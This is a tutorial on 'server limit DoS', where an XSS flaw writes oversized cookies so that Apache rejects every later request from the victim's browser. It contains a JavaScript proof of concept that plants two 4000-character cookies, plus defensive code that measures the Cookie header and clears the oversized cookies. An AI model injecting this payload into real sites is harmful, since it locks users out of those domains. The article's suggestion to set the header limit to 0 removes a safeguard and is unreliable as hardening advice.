In this article, we will take a look at server limit DoS. Web servers impose a length limit on HTTP headers; for Apache, the default is 8192 bytes. In other words, the maximum size of an HTTP header that Apache accepts is 8192 bytes (for the request body, the default limit is 2 GB). If a client sends an HTTP header that exceeds this size, the server returns a 4xx error with the following message:

Your browser sent a request that this server could not understand. The size of a request header field exceeds the server limit.

If an attacker uses an XSS vulnerability to write an overly long cookie to the client, the client can no longer access any page on the cookie's domain until the cookie is cleared. The cookie is sent in the HTTP header, so by default the web server treats every subsequent request as abnormally long and rejects it, which amounts to a DoS against the client.
The POC code is as follows:

<script language="javascript">
alert(document.cookie);
var metastr = "AAAAAAAAAA"; // 10 A
var str = "";
// Build a 4000-character value by repeating the 10-character unit.
while (str.length < 4000) {
    str += metastr;
}
alert(str.length);
// Write three cookies: one short XSS payload and two 4000-character values.
// (The backslashes keep the inline HTML parser from seeing a literal </script>.)
document.cookie = "evil3=" + "\<script\>alert(xss)\<\/script\>" + ";expires=Thu, 18-Apr-2019 08:37:43 GMT;";
document.cookie = "evil1=" + str + ";expires=Thu, 18-Apr-2019 08:37:43 GMT;";
document.cookie = "evil2=" + str + ";expires=Thu, 18-Apr-2019 08:37:43 GMT;";
alert(document.cookie);
</script>

Running this writes the long cookies to the client.
To resolve this problem, you need to adjust Apache's LimitRequestFieldSize configuration directive. When this parameter is set to 0, the size of the HTTP header is not limited.
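From the defender's side, the useful check is how large the Cookie header a browser will send has become, and which cookies have to be cleared to get back under the limit. The following is an added example, not code from the original text: it parses a document.cookie-style string, computes the byte size of the resulting Cookie header line, and picks the largest cookies to expire until the header fits the 8192-byte Apache default quoted above. The cookie names and the 4200-byte values are constructed for the demo.

```javascript
// Added example: measure the Cookie request header and decide which cookies
// to clear. APACHE_DEFAULT_LIMIT is the default header size quoted above.
const APACHE_DEFAULT_LIMIT = 8192;

// Split a document.cookie-style string ("a=1; b=2") into [name, value] pairs.
function parseCookies(cookieString) {
  return cookieString
    .split(";")
    .map((part) => part.trim())
    .filter((part) => part.length > 0)
    .map((part) => {
      const eq = part.indexOf("=");
      return eq === -1 ? [part, ""] : [part.slice(0, eq), part.slice(eq + 1)];
    });
}

// Byte length of the "Cookie: a=1; b=2\r\n" header line the browser sends.
function cookieHeaderSize(pairs) {
  const body = pairs.map(([n, v]) => (v === "" ? n : `${n}=${v}`)).join("; ");
  return Buffer.byteLength(`Cookie: ${body}\r\n`, "utf8");
}

// Names of cookies to drop, largest value first, until the header fits.
function cookiesToClear(cookieString, limit = APACHE_DEFAULT_LIMIT) {
  const pairs = parseCookies(cookieString);
  const sorted = [...pairs].sort((a, b) => b[1].length - a[1].length);
  const keep = [...pairs];
  const cleared = [];
  for (const [name] of sorted) {
    if (cookieHeaderSize(keep) <= limit) break;
    keep.splice(keep.findIndex(([n]) => n === name), 1);
    cleared.push(name);
  }
  return cleared;
}

// The document.cookie assignment that expires one cookie (path "/" assumed).
function expireCookie(name) {
  return `${name}=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/`;
}

// Constructed sample: a normal session cookie plus two 4200-byte payloads,
// the same shape as the cookies the POC above writes.
const padding = "A".repeat(4200);
const SAMPLE = `sid=abc123; evil1=${padding}; evil2=${padding}`;

// In a page served on the affected domain, recovery would be:
//   cookiesToClear(document.cookie).forEach((n) => { document.cookie = expireCookie(n); });
console.log(cookieHeaderSize(parseCookies(SAMPLE)), cookiesToClear(SAMPLE));
```

The recovery assignment only works from a page the browser can still load, so in practice it belongs on a path the server exempts from the limit or on a sibling origin that can set cookies for the domain.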
From the description above, we can see that DoS attacks are essentially resource-exhaustion attacks. When designing a system, therefore, you need to anticipate the various ways in which its limited resources could be maliciously consumed, which raises the bar for security design.